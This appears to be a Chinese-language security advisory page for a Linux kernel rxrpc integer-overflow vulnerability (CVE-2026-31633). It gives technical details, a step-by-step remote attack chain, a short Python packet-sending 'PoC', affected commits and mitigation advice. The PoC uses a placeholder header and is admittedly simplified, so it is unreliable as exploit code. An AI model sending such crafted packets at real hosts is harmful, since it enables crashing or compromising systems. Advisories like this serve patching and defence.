CVE-2026-31633 CVSS 9.8 严重

CVE-2026-31633 Linux内核 rxrpc 整数溢出漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31633

漏洞类型

整数溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的rxrpc模块中存在一个严重的整数溢出漏洞。该漏洞发生在`rxgk_verify_response`函数中，由于在验证响应长度时，先对`token_len`进行了向上取整操作，然后再进行长度检查。这种逻辑缺陷导致攻击者可以构造特定的恶意数据包，绕过长度限制检查，进而引发整数溢出。由于该漏洞无需用户交互且无需认证即可通过网络远程利用，攻击者可能利用此漏洞导致系统崩溃、内存破坏，或在特定条件下执行任意代码，对机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的根本原因在于Linux内核`rxrpc`模块的`rxgk_verify_response`函数中存在逻辑错误。该函数负责验证响应数据的合法性，其中包含对令牌长度的检查。代码中首先对`token_len`进行了向上取整（rounding up）操作，随后才将取整后的值与缓冲区剩余长度`len`进行比较。由于取整操作发生在边界检查之前，如果原始的`token_len`值接近整数类型的上限，取整操作可能导致整数回绕，使得取整后的值反而变小，从而欺骗了后续的长度检查机制。攻击者可以通过网络发送特制的UDP数据包，其中包含精心构造的长度字段，触发该整数溢出。由于`rxgk`协议通常用于处理网络认证相关数据，绕过长度检查后，后续的数据拷贝或解析操作可能会访问越界的内存区域。这可能导致内核堆栈溢出、堆破坏或信息泄露。鉴于该漏洞的CVSS 3.1评分为9.8，且攻击向量为网络，无需权限，这属于高危级别的远程漏洞。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别运行受影响Linux内核版本且启用了rxrpc服务的目标主机。

STEP 2

构造恶意数据包

攻击者编写恶意脚本，构造包含特定长度字段的UDP数据包，该字段在取整后将触发整数溢出。

STEP 3

发送攻击请求

攻击者通过网络将恶意数据包发送给目标的rxrpc服务端口，无需经过身份认证。

STEP 4

触发漏洞

目标内核处理数据包时，`rxgk_verify_response`函数中的取整操作导致长度检查被绕过，引发整数溢出。

STEP 5

达成效果

整数溢出导致后续操作访问越界内存，可能导致内核崩溃（拒绝服务）或潜在的任意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# PoC for CVE-2026-31633
# This script sends a specially crafted UDP packet to trigger the integer overflow
# in rxgk_verify_response within the Linux Kernel rxrpc module.

TARGET_IP = "192.168.1.100"  # Replace with target IP
TARGET_PORT = 7000           # Replace with target rxrpc port if known

def create_exploit_packet():
    # Construct a packet with a token_len that causes overflow when rounded up
    # Example: A value close to UINT_MAX that wraps around when rounded
    header = b"\x00" * 20  # Simplified rxrpc header placeholder
    
    # Malicious token length field (simplified for demonstration)
    # In a real scenario, this would be a specific large integer
    malicious_len = struct.pack('>I', 0xFFFFFFFC) 
    
    payload = header + malicious_len + b"A" * 100
    return payload

if __name__ == "__main__":
    print(f"[*] Sending exploit packet to {TARGET_IP}:{TARGET_PORT}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(create_exploit_packet(), (TARGET_IP, TARGET_PORT))
    print("[+] Packet sent. Check target for crash or instability.")

影响范围

Linux Kernel (Commit 1f864d9daaf622aeaa774404fd51e7d6a435b046 之前)

Linux Kernel (Commit 699e52180f4231c257821c037ed5c99d5eb0edb8 之前)

Linux Kernel (Commit c1e242beb6b1efc3c286f617e8d940c8fbf2ed41 之前)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。如果系统环境不允许立即重启升级，可以通过防火墙规则阻断外部对rxrpc服务的访问，或者在内核配置中禁用rxrpc模块（CONFIG_RXRPC），直到完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表